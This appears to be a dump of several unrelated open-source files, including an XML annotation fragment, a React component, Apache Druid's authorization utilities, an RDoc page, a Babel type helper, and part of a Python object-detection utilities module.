<desc id="3732" len="32" off="2714">3400|MOD:DIST:963|MOD:DIST:965|MOD:DIST:967|NUC:DIST:969|MOD:DIST:971~973</desc>
<desc id="3733" len="9" off="2748">3401|MOD:DIST:978|NUC:DIST:980</desc>
<desc id="3734" len="22" off="2771">3402|MOD:DESC:986|MOD:DIST:988|NUC:DIST:990</desc>
<desc id="3735" len="9" off="2797">3403|NUC:DIST:994</desc>
<desc id="3736" len="15" off="2820">3404|MOD:DIST:1000|MOD:DIST:1002|NUC:DIST:1004</desc>
<desc id="3737" len="33" off="2843">3405|MOD:DIST:1008|MOD:DIST:1010|MOD:DIST:1012|NUC:DIST:1014|MOD:DIST:1016~1018</desc>
<desc id="3738" len="10" off="2881">3406|NUC:DIST:1025</desc>
<desc id="3739" len="5" off="2893">3407|NUC:DIST:1029</desc>
<desc id="3740" len="12" off="2893">3408|MOD:DIST:1029|NUC:DIST:1031</desc>
<desc id="3741" len="10" off="2911">3409|MOD:DIST:1035|NUC:DIST:1037</desc>
<desc id="3742" len="11" off="2927">3410|NUC:DIST:1041</desc>
<desc id="3743" len="128" off="2944">3411|MOD:DIST:1045|NUC:DESC:1047|MOD:DESC:1051~1053~1055~1057~1059~1061~1063~1065~1067~1069~1071~1073~1075~1077~1079~1081~1083~1085~1087</desc>
<desc id="3744" len="48" off="2969">3412|MOD:DIST:1055|NUC:DIST:1057|MOD:DIST:1059~1061~1063~1065~1067~1069</desc>
<desc id="3745" len="13" off="2993">3413|MOD:DIST:1061|NUC:DESC:1063~1065</desc>
<desc id="3746" len="24" off="2993">3414|MOD:DIST:1061~1063~1065~1067|NUC:DIST:1069</desc>
<desc id="3747" len="32" off="3023">3415|MOD:DIST:1073|NUC:DIST:1075~1077~1079~1081</desc>
<desc id="3748" len="10" off="3062">3416|MOD:DIST:1085|NUC:DIST:1087</desc>
<desc id="3749" len="2" off="3092">3417|NUC:DIST:1102</desc>
<desc id="3750" len="5" off="3105">3418|NUC:DIST:1108</desc>
<desc id="3751" len="10" off="3128">3419|MOD:DIST:1116|NUC:DESC:1118</desc>
<desc id="3752" len="6" off="3153">3420|NUC:DIST:1124</desc>
<desc id="3753" len="30" off="3173">3421|MOD:DIST:1133|MOD:DIST:1135|MOD:DIST:1137|NUC:DIST:1139</desc>
<desc id="3754" len="71" off="3205">3422|MOD:DIST:1143|NUC:DIST:1145|MOD:DESC:1149~1151~1153~1155~1157~1159~1161~1163</desc>
<desc id="3755" len="31" off="3245">3423|NUC:DIST:1157|MOD:DIST:1159~1161~1163</desc>
<desc id="3756" len="17" off="3259">3424|MOD:DIST:1161|NUC:DIST:1163</desc>
<desc id="3757" len="2" off="3283">3425|NUC:DIST:1169</desc>
<desc id="3758" len="54" off="3291">3426|MOD:DIST:1173|MOD:DIST:1175~1177~1179~1181|NUC:DIST:1183</desc>
<desc id="3759" len="5" off="3295">3427|NUC:DIST:1175</desc>
<desc id="3760" len="2" off="3351">3428|NUC:DIST:1187</desc>
<desc id="3761" len="33" off="3368">3429|MOD:DIST:1193|MOD:DIST:1195|MOD:DIST:1197|NUC:DIST:1199</desc>
<desc id="3762" len="7" off="3415">3430|MOD:DIST:1205|NUC:DIST:1207</desc>
<desc id="3763" len="12" off="3449">3431|MOD:DIST:1217|NUC:DIST:1219</desc>
<desc id="3764" len="6" off="3467">3432|MOD:DIST:1225|NUC:DIST:1227</desc>
<desc id="3765" len="26" off="3475">3433|MOD:DIST:1232|MOD:DIST:1234|NUC:DIST:1236</desc>
<desc id="3766" len="12" off="3519">3434|NUC:DIST:1246~1248</desc>
<desc id="3767" len="11" off="3544">3435|NUC:DIST:1258~1260</desc>
<desc id="3768" len="19" off="3562">3436|MOD:DIST:1266|NUC:DIST:1268</desc>
<desc id="3769" len="7" off="3596">3437|MOD:DIST:1276|NUC:DIST:1278</desc>
<desc id="3770" len="69" off="3604">3438|MOD:DIST:1280|NUC:DIST:1282|MOD:DIST:1284~1286~1288~1290~1292~1294~1296~1298~1300~1302</desc>
<desc id="3771" len="12" off="3626">3439|MOD:DIST:1290|NUC:DIST:1292</desc>
<desc id="3772" len="7" off="3645">3440|NUC:DIST:1296</desc>
<desc id="3773" len="3" off="3675">3441|NUC:DIST:1307</desc>
<desc id="3774" len="28" off="3675">3442|MOD:DESC:1307~1309|NUC:DIST:1311~1313</desc>
<desc id="3775" len="2" off="3713">3443|NUC:DIST:1319</desc>
<desc id="3776" len="48" off="3746">3444|NUC:DESC:1331~1333|MOD:DIST:1335~1337~1339~1341~1343</desc>
<desc id="3777" len="21" off="3773">3445|MOD:DIST:1339|MOD:DIST:1341|NUC:DIST:1343</desc>
<desc id="3778" len="2" off="3800">3446|NUC:DIST:1349</desc>
<desc id="3779" len="19" off="3817">3447|MOD:DIST:1357|NUC:DIST:1359</desc>
<desc id="3780" len="8" off="3845">3448|NUC:DIST:1365</desc>
<desc id="3781" len="12" off="3855">3449|MOD:DIST:1370|MOD:DIST:1372|NUC:DIST:1374</desc>
<desc id="3782" len="5" off="3857">3450|NUC:DIST:1372</desc>
<desc id="3783" len="10" off="3883">3451|MOD:DIST:1380|NUC:DIST:1382</desc>
<desc id="3784" len="19" off="3934">3452|MOD:DIST:1404|MOD:DIST:1406~1408|NUC:DIST:1410</desc>
<desc id="3785" len="5" off="3954">3453|NUC:DIST:1412</desc>
<desc id="3786" len="24" off="3960">3454|NUC:DIST:1414|MOD:DIST:1416~1418~1420</desc>
<desc id="3787" len="9" off="4022">3455|MOD:DIST:1441|NUC:DIST:1443</desc>
<desc id="3788" len="10" off="4033">3456|MOD:DIST:1447|NUC:DIST:1449</desc>
<desc id="3789" len="16" off="4052">3457|MOD:DIST:1453|NUC:DIST:1455</desc>
<desc id="3790" len="58" off="4052">3458|MOD:DIST:1453~1455~1457|NUC:DIST:1459|MOD:DESC:1463~1465~1467~1469~1471~1473</desc>
<desc id="3791" len="57" off="4137">3459|NUC:DIST:1487|MOD:DIST:1489~1491~1493~1495~1497~1499~1501~1503</desc>
<desc id="3792" len="22" off="4172">3460|MOD:DIST:1499|MOD:DIST:1501|NUC:DIST:1503</desc>
<desc id="3793" len="6" off="4198">3461|NUC:DIST:1510</desc>
<desc id="3794" len="2" off="4210">3462|NUC:DIST:1514</desc>
<desc id="3795" len="4" off="4229">3463|NUC:DIST:1522</desc>
<desc id="3796" len="31" off="4255">3464|MOD:DIST:1532~1534|MOD:DIST:1536|NUC:DIST:1538</desc>
<desc id="3797" len="8" off="4302">3465|MOD:DIST:1546|NUC:DIST:1548</desc>
<desc id="3798" len="10" off="4317">3466|MOD:DIST:1555|NUC:DIST:1557</desc>
<desc id="3799" len="2" off="4349">3467|NUC:DIST:1565</desc>
<desc id="3800" len="8" off="4387">3468|MOD:DIST:1579|NUC:DIST:1581</desc>
<desc id="3801" len="9" off="4399">3469|MOD:DIST:1585|NUC:DIST:1587</desc>
<desc id="3802" len="8" off="4410">3470|MOD:DIST:1591|NUC:DIST:1593</desc>
<desc id="3803" len="32" off="4430">3471|MOD:DIST:1602|NUC:DIST:1604|MOD:DIST:1606~1608~1610</desc>
<desc id="3804" len="11" off="4451">3472|MOD:DIST:1608|NUC:DIST:1610</desc>
<desc id="3805" len="11" off="4464">3473|MOD:DIST:1614|NUC:DIST:1616</desc>
<desc id="3806" len="10" off="4482">3474|MOD:DIST:1620|NUC:DIST:1622</desc>
<desc id="3807" len="33" off="4521">3475|MOD:DIST:1634|MOD:DIST:1636~1638~1640~1642|NUC:DIST:1644</desc>
<desc id="3808" len="17" off="4523">3476|NUC:DIST:1636~1638~1640</desc>
<desc id="3809" len="23" off="4523">3477|MOD:DIST:1636~1638~1640|NUC:DIST:1642</desc>
<desc id="3810" len="5" off="4555">3478|NUC:DIST:1646</desc>
<desc id="3811" len="10" off="4562">3479|MOD:DIST:1651|NUC:DIST:1653</desc>
<desc id="3812" len="13" off="4578">3480|MOD:DIST:1657|NUC:DESC:1659~1661</desc>
<desc id="3813" len="25" off="4612">3481|MOD:DIST:1671|MOD:DIST:1673|NUC:DIST:1675</desc>
<desc id="3814" len="13" off="4639">3482|MOD:DIST:1680|NUC:DIST:1682</desc>
<desc id="3815" len="11" off="4661">3483|MOD:DIST:1686|NUC:DIST:1688</desc>
<desc id="3816" len="11" off="4674">3484|MOD:DIST:1692|NUC:DIST:1694</desc>
<desc id="3817" len="15" off="4697">3485|MOD:DIST:1702|NUC:DIST:1704</desc>
<desc id="3818" len="27" off="4746">3486|MOD:DIST:1718|NUC:DIST:1720|MOD:DIST:1722~1724~1726</desc>
<desc id="3819" len="9" off="4764">3487|MOD:DIST:1724|NUC:DIST:1726</desc>
<desc id="3820" len="29" off="4791">3488|NUC:DIST:1736|MOD:DIST:1738~1740~1742~1744~1746</desc>
<desc id="3821" len="10" off="4810">3489|MOD:DIST:1744|NUC:DIST:1746</desc>
<desc id="3822" len="38" off="4822">3490|NUC:DIST:1751|MOD:DIST:1753~1755~1757~1759~1761</desc>
<desc id="3823" len="27" off="4833">3491|MOD:DIST:1755|MOD:DIST:1757|MOD:DIST:1759|NUC:DIST:1761</desc>
<desc id="3824" len="12" off="4870">3492|MOD:DIST:1765|NUC:DIST:1767</desc>
<desc id="3825" len="163" off="4897">3493|MOD:DIST:1775|NUC:DIST:1777~1779|MOD:DESC:1781~1783~1785|MOD:DESC:1789~1791~1793~1795~1797~1799~1801~1803|MOD:DESC:1807~1809~1811~1813~1815~1817~1819~1821~1823~1825~1827~1829~1831~1833</desc>
<desc id="3826" len="5" off="4935">3494|NUC:DIST:1793</desc>
<desc id="3827" len="36" off="4935">3495|MOD:DIST:1793|NUC:DIST:1795~1797~1799~1801</desc>
<desc id="3828" len="10" off="5010">3496|MOD:DIST:1819|NUC:DIST:1821</desc>
<desc id="3829" len="15" off="5027">3497|MOD:DIST:1825|NUC:DIST:1827</desc>
<desc id="3830" len="14" off="5046">3498|MOD:DIST:1831|NUC:DIST:1833</desc>
<desc id="3831" len="11" off="5062">3499|MOD:DIST:1838|NUC:DIST:1840</desc>
<desc id="3832" len="7" off="5084">3500|NUC:DIST:1844</desc>
<desc id="3833" len="7" off="5093">3501|NUC:DIST:1848</desc>
<desc id="3834" len="97" off="5113">3502|MOD:DIST:1856|NUC:DIST:1858|MOD:DIST:1860~1862~1864~1866~1868~1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3835" len="58" off="5152">3503|MOD:DIST:1864|NUC:DIST:1866|MOD:DESC:1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3836" len="7" off="5180">3504|NUC:DIST:1874</desc>
<desc id="3837" len="12" off="5198">3505|NUC:DIST:1880~1882</desc>
<desc id="3838" len="20" off="5212">3506|MOD:DIST:1887|MOD:DIST:1889|NUC:DIST:1891</desc>
<desc id="3839" len="7" off="5216">3507|NUC:DIST:1889</desc>
<desc id="3840" len="101" off="5250">3508|MOD:DIST:1899|NUC:DIST:1901~1903~1905~1907|MOD:DESC:1911~1913~1915~1917~1919~1921~1923~1925~1927</desc>
<desc id="3841" len="27" off="5309">3509|MOD:DIST:1917|MOD:DIST:1919|NUC:DIST:1921</desc>
<desc id="3842" len="11" off="5340">3510|MOD:DIST:1925|NUC:DIST:1927</desc>
</rep>
</story>
| {
"pile_set_name": "Github"
} |
import React from "react";
import { IReportItem, IReport } from '../src/ts/devtools/Report';
// REPLACE_IMPORTS
interface IHelpSwitcherProps {
report: IReport,
item: IReportItem;
}
export default class HelpSwitcher extends React.Component<IHelpSwitcherProps> {
render() {
return(<React.Fragment>
{/* REPLACE_FILES */}
</React.Fragment>);
}
} | {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.server.security;
import com.google.common.base.Function;
import com.google.common.collect.Iterables;
import com.google.common.collect.Lists;
import org.apache.druid.java.util.common.ISE;
import javax.servlet.http.HttpServletRequest;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
/**
* Static utility functions for performing authorization checks.
*/
public class AuthorizationUtils
{
/**
* Check a resource-action using the authorization fields from the request.
*
   * If the resource-action fails the authorization check, this method returns the failed Access object from the check.
   *
   * Otherwise, if the resource-action is authorized, return ACCESS_OK.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
   * @param resourceAction A resource identifier and the action to be taken on the resource.
* @param authorizerMapper The singleton AuthorizerMapper instance
*
* @return ACCESS_OK or the failed Access object returned by the Authorizer that checked the request.
*/
public static Access authorizeResourceAction(
final HttpServletRequest request,
final ResourceAction resourceAction,
final AuthorizerMapper authorizerMapper
)
{
return authorizeAllResourceActions(
request,
Collections.singletonList(resourceAction),
authorizerMapper
);
}
/**
* Returns the authentication information for a request.
*
* @param request http request
*
* @return authentication result
*
* @throws IllegalStateException if the request was not authenticated
*/
public static AuthenticationResult authenticationResultFromRequest(final HttpServletRequest request)
{
final AuthenticationResult authenticationResult = (AuthenticationResult) request.getAttribute(
AuthConfig.DRUID_AUTHENTICATION_RESULT
);
if (authenticationResult == null) {
throw new ISE("Null authentication result");
}
return authenticationResult;
}
/**
* Check a list of resource-actions to be performed by the identity represented by authenticationResult.
*
* If one of the resource-actions fails the authorization check, this method returns the failed
* Access object from the check.
*
* Otherwise, return ACCESS_OK if all resource-actions were successfully authorized.
*
* @param authenticationResult Authentication result representing identity of requester
* @param resourceActions An Iterable of resource-actions to authorize
*
* @return ACCESS_OK or the Access object from the first failed check
*/
public static Access authorizeAllResourceActions(
final AuthenticationResult authenticationResult,
final Iterable<ResourceAction> resourceActions,
final AuthorizerMapper authorizerMapper
)
{
final Authorizer authorizer = authorizerMapper.getAuthorizer(authenticationResult.getAuthorizerName());
if (authorizer == null) {
throw new ISE("No authorizer found with name: [%s].", authenticationResult.getAuthorizerName());
}
// this method returns on first failure, so only successful Access results are kept in the cache
final Set<ResourceAction> resultCache = new HashSet<>();
for (ResourceAction resourceAction : resourceActions) {
if (resultCache.contains(resourceAction)) {
continue;
}
final Access access = authorizer.authorize(
authenticationResult,
resourceAction.getResource(),
resourceAction.getAction()
);
if (!access.isAllowed()) {
return access;
} else {
resultCache.add(resourceAction);
}
}
return Access.OK;
}
/**
* Check a list of resource-actions to be performed as a result of an HTTP request.
*
* If one of the resource-actions fails the authorization check, this method returns the failed
* Access object from the check.
*
* Otherwise, return ACCESS_OK if all resource-actions were successfully authorized.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
* @param resourceActions An Iterable of resource-actions to authorize
*
* @return ACCESS_OK or the Access object from the first failed check
*/
public static Access authorizeAllResourceActions(
final HttpServletRequest request,
final Iterable<ResourceAction> resourceActions,
final AuthorizerMapper authorizerMapper
)
{
if (request.getAttribute(AuthConfig.DRUID_ALLOW_UNSECURED_PATH) != null) {
return Access.OK;
}
if (request.getAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED) != null) {
throw new ISE("Request already had authorization check.");
}
Access access = authorizeAllResourceActions(
authenticationResultFromRequest(request),
resourceActions,
authorizerMapper
);
request.setAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED, access.isAllowed());
return access;
}
/**
   * Filter a collection of resources by applying the resourceActionGenerator to each resource, returning an
   * iterable containing the filtered resources.
*
* The resourceActionGenerator returns an Iterable<ResourceAction> for each resource.
*
* If every resource-action in the iterable is authorized, the resource will be added to the filtered resources.
*
* If there is an authorization failure for one of the resource-actions, the resource will not be
   * added to the returned filtered resources.
*
* If the resourceActionGenerator returns null for a resource, that resource will not be added to the filtered
* resources.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
* @param resources resources to be processed into resource-actions
* @param resourceActionGenerator Function that creates an iterable of resource-actions from a resource
* @param authorizerMapper authorizer mapper
*
* @return Iterable containing resources that were authorized
*/
public static <ResType> Iterable<ResType> filterAuthorizedResources(
final HttpServletRequest request,
final Iterable<ResType> resources,
final Function<? super ResType, Iterable<ResourceAction>> resourceActionGenerator,
final AuthorizerMapper authorizerMapper
)
{
if (request.getAttribute(AuthConfig.DRUID_ALLOW_UNSECURED_PATH) != null) {
return resources;
}
if (request.getAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED) != null) {
throw new ISE("Request already had authorization check.");
}
final AuthenticationResult authenticationResult = authenticationResultFromRequest(request);
final Iterable<ResType> filteredResources = filterAuthorizedResources(
authenticationResult,
resources,
resourceActionGenerator,
authorizerMapper
);
// We're filtering, so having access to none of the objects isn't an authorization failure (in terms of whether
    // to send an error response or not).
request.setAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED, true);
return filteredResources;
}
/**
   * Filter a collection of resources by applying the resourceActionGenerator to each resource, returning an
   * iterable containing the filtered resources.
*
* The resourceActionGenerator returns an Iterable<ResourceAction> for each resource.
*
* If every resource-action in the iterable is authorized, the resource will be added to the filtered resources.
*
* If there is an authorization failure for one of the resource-actions, the resource will not be
   * added to the returned filtered resources.
*
* If the resourceActionGenerator returns null for a resource, that resource will not be added to the filtered
* resources.
*
* @param authenticationResult Authentication result representing identity of requester
* @param resources resources to be processed into resource-actions
* @param resourceActionGenerator Function that creates an iterable of resource-actions from a resource
* @param authorizerMapper authorizer mapper
*
* @return Iterable containing resources that were authorized
*/
public static <ResType> Iterable<ResType> filterAuthorizedResources(
final AuthenticationResult authenticationResult,
final Iterable<ResType> resources,
final Function<? super ResType, Iterable<ResourceAction>> resourceActionGenerator,
final AuthorizerMapper authorizerMapper
)
{
final Authorizer authorizer = authorizerMapper.getAuthorizer(authenticationResult.getAuthorizerName());
if (authorizer == null) {
throw new ISE("No authorizer found with name: [%s].", authenticationResult.getAuthorizerName());
}
final Map<ResourceAction, Access> resultCache = new HashMap<>();
final Iterable<ResType> filteredResources = Iterables.filter(
resources,
resource -> {
final Iterable<ResourceAction> resourceActions = resourceActionGenerator.apply(resource);
if (resourceActions == null) {
return false;
}
for (ResourceAction resourceAction : resourceActions) {
Access access = resultCache.computeIfAbsent(
resourceAction,
ra -> authorizer.authorize(
authenticationResult,
ra.getResource(),
ra.getAction()
)
);
if (!access.isAllowed()) {
return false;
}
}
return true;
}
);
return filteredResources;
}
/**
* Given a map of resource lists, filter each resources list by applying the resource action generator to each
* item in each resource list.
*
* The resourceActionGenerator returns an Iterable<ResourceAction> for each resource.
*
* If a resource list is null or has no authorized items after filtering, it will not be included in the returned
* map.
*
* This function will set the DRUID_AUTHORIZATION_CHECKED attribute in the request.
*
* If this attribute is already set when this function is called, an exception is thrown.
*
* @param request HTTP request to be authorized
* @param unfilteredResources Map of resource lists to be filtered
* @param resourceActionGenerator Function that creates an iterable of resource-actions from a resource
* @param authorizerMapper authorizer mapper
*
* @return Map containing lists of resources that were authorized
*/
public static <KeyType, ResType> Map<KeyType, List<ResType>> filterAuthorizedResources(
final HttpServletRequest request,
final Map<KeyType, List<ResType>> unfilteredResources,
final Function<? super ResType, Iterable<ResourceAction>> resourceActionGenerator,
final AuthorizerMapper authorizerMapper
)
{
if (request.getAttribute(AuthConfig.DRUID_ALLOW_UNSECURED_PATH) != null) {
return unfilteredResources;
}
if (request.getAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED) != null) {
throw new ISE("Request already had authorization check.");
}
final AuthenticationResult authenticationResult = AuthorizationUtils.authenticationResultFromRequest(request);
Map<KeyType, List<ResType>> filteredResources = new HashMap<>();
for (Map.Entry<KeyType, List<ResType>> entry : unfilteredResources.entrySet()) {
if (entry.getValue() == null) {
continue;
}
final List<ResType> filteredList = Lists.newArrayList(
AuthorizationUtils.filterAuthorizedResources(
authenticationResult,
entry.getValue(),
resourceActionGenerator,
authorizerMapper
)
);
if (filteredList.size() > 0) {
filteredResources.put(
entry.getKey(),
filteredList
);
}
}
request.setAttribute(AuthConfig.DRUID_AUTHORIZATION_CHECKED, true);
return filteredResources;
}
/**
* Function for the common pattern of generating a resource-action for reading from a datasource, using the
* datasource name.
*/
public static final Function<String, ResourceAction> DATASOURCE_READ_RA_GENERATOR = input -> new ResourceAction(
new Resource(input, ResourceType.DATASOURCE),
Action.READ
);
/**
   * Function for the common pattern of generating a resource-action for writing to a datasource, using the
* datasource name.
*/
public static final Function<String, ResourceAction> DATASOURCE_WRITE_RA_GENERATOR = input -> new ResourceAction(
new Resource(input, ResourceType.DATASOURCE),
Action.WRITE
);
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<title>module Liquid - jekyll-gist-1.3.5 Documentation</title>
<link type="text/css" media="screen" href="./rdoc.css" rel="stylesheet">
<script type="text/javascript">
var rdoc_rel_prefix = "./";
</script>
<script type="text/javascript" charset="utf-8" src="./js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/navigation.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/search_index.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/search.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/searcher.js"></script>
<script type="text/javascript" charset="utf-8" src="./js/darkfish.js"></script>
<body id="top" class="module">
<nav id="metadata">
<nav id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./table_of_contents.html#classes">Classes</a>
<a href="./table_of_contents.html#methods">Methods</a>
</h3>
</nav>
<nav id="search-section" class="section project-section" class="initially-hidden">
<form action="#" method="get" accept-charset="utf-8">
<h3 class="section-header">
<input type="text" name="search" placeholder="Search" id="search-field"
title="Type to search, Up and Down to navigate, Enter to load">
</h3>
</form>
<ul id="search-results" class="initially-hidden"></ul>
</nav>
<div id="file-metadata">
<nav id="file-list-section" class="section">
<h3 class="section-header">Defined In</h3>
<ul>
<li>lib/jekyll-gist/gist_tag.rb
</ul>
</nav>
</div>
<div id="class-metadata">
</div>
<div id="project-metadata">
<nav id="classindex-section" class="section project-section">
<h3 class="section-header">Class and Module Index</h3>
<ul class="link-list">
<li><a href="./Jekyll.html">Jekyll</a>
<li><a href="./Jekyll/Gist.html">Jekyll::Gist</a>
<li><a href="./Jekyll/Gist/GistTag.html">Jekyll::Gist::GistTag</a>
<li><a href="./Liquid.html">Liquid</a>
<li><a href="./Net.html">Net</a>
</ul>
</nav>
</div>
</nav>
<div id="documentation">
<h1 class="module">module Liquid</h1>
<div id="description" class="description">
</div><!-- description -->
<section id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
</section><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<footer id="validator-badges">
<p><a href="http://validator.w3.org/check/referer">[Validate]</a>
<p>Generated by <a href="https://github.com/rdoc/rdoc">RDoc</a> 4.0.0.
<p>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish Rdoc Generator</a> 3.
</footer>
</body>
</html>
| {
"pile_set_name": "Github"
} |
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.default = removeTypeDuplicates;
var _generated = require("../../validators/generated");
function removeTypeDuplicates(nodes) {
const generics = {};
const bases = {};
const typeGroups = [];
const types = [];
for (let i = 0; i < nodes.length; i++) {
const node = nodes[i];
if (!node) continue;
if (types.indexOf(node) >= 0) {
continue;
}
if ((0, _generated.isAnyTypeAnnotation)(node)) {
return [node];
}
if ((0, _generated.isFlowBaseAnnotation)(node)) {
bases[node.type] = node;
continue;
}
if ((0, _generated.isUnionTypeAnnotation)(node)) {
if (typeGroups.indexOf(node.types) < 0) {
nodes = nodes.concat(node.types);
typeGroups.push(node.types);
}
continue;
}
if ((0, _generated.isGenericTypeAnnotation)(node)) {
const name = node.id.name;
if (generics[name]) {
let existing = generics[name];
if (existing.typeParameters) {
if (node.typeParameters) {
existing.typeParameters.params = removeTypeDuplicates(existing.typeParameters.params.concat(node.typeParameters.params));
}
} else {
existing = node.typeParameters;
}
} else {
generics[name] = node;
}
continue;
}
types.push(node);
}
for (const type of Object.keys(bases)) {
types.push(bases[type]);
}
for (const name of Object.keys(generics)) {
types.push(generics[name]);
}
return types;
} | {
"pile_set_name": "Github"
} |
import glob
import math
import os
import random
import shutil
import subprocess
from pathlib import Path
from sys import platform
import cv2
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torchvision
from tqdm import tqdm
from . import torch_utils # , google_utils
# Set printoptions
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
matplotlib.rc('font', **{'size': 11})
# Prevent OpenCV from multithreading (to use PyTorch DataLoader)
cv2.setNumThreads(0)
def init_seeds(seed=0):
random.seed(seed)
np.random.seed(seed)
torch_utils.init_seeds(seed=seed)
def load_classes(path):
# Loads *.names file at 'path'
with open(path, 'r') as f:
names = f.read().split('\n')
return list(filter(None, names)) # filter removes empty strings (such as last line)
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
classes = labels[:, 0].astype(np.int) # labels = [class xywh]
    weights = np.bincount(classes, minlength=nc)  # occurrences per class
    # Prepend gridpoint count (for uCE training)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
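# Editor's illustrative sketch (hypothetical helper, not part of the original module): shows the
# inverse-frequency weighting above on two toy label arrays with class ids in column 0.
def _demo_labels_to_class_weights():
    toy = [np.array([[0, 0.5, 0.5, 0.1, 0.1],
                     [0, 0.2, 0.3, 0.1, 0.1],
                     [0, 0.8, 0.8, 0.2, 0.2]], dtype=np.float32),
           np.array([[1, 0.4, 0.6, 0.3, 0.3]], dtype=np.float32)]
    w = labels_to_class_weights(toy, nc=2)
    print(w)  # tensor([0.25, 0.75]) -> the rarer class 1 gets the larger weight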
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class mAPs
n = len(labels)
class_counts = np.array([np.bincount(labels[i][:, 0].astype(np.int), minlength=nc) for i in range(n)])
image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1)
# index = random.choices(range(n), weights=image_weights, k=1) # weight image sample
return image_weights
def coco_class_weights(): # frequency of each class in coco train2014
n = [187437, 4955, 30920, 6033, 3838, 4332, 3160, 7051, 7677, 9167, 1316, 1372, 833, 6757, 7355, 3302, 3776, 4671,
6769, 5706, 3908, 903, 3686, 3596, 6200, 7920, 8779, 4505, 4272, 1862, 4698, 1962, 4403, 6659, 2402, 2689,
4012, 4175, 3411, 17048, 5637, 14553, 3923, 5539, 4289, 10084, 7018, 4314, 3099, 4638, 4939, 5543, 2038, 4004,
5053, 4578, 27292, 4113, 5931, 2905, 11174, 2873, 4036, 3415, 1517, 4122, 1980, 4464, 1190, 2302, 156, 3933,
1877, 17630, 4337, 4624, 1075, 3468, 135, 1380]
weights = 1 / torch.Tensor(n)
weights /= weights.sum()
# with open('data/coco.names', 'r') as f:
# for k, v in zip(f.read().splitlines(), n):
# print('%20s: %g' % (k, v))
return weights
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
return x
def xyxy2xywh(x):
# Transform box coordinates from [x1, y1, x2, y2] (where xy1=top-left, xy2=bottom-right) to [x, y, w, h]
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Transform box coordinates from [x, y, w, h] to [x1, y1, x2, y2] (where xy1=top-left, xy2=bottom-right)
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
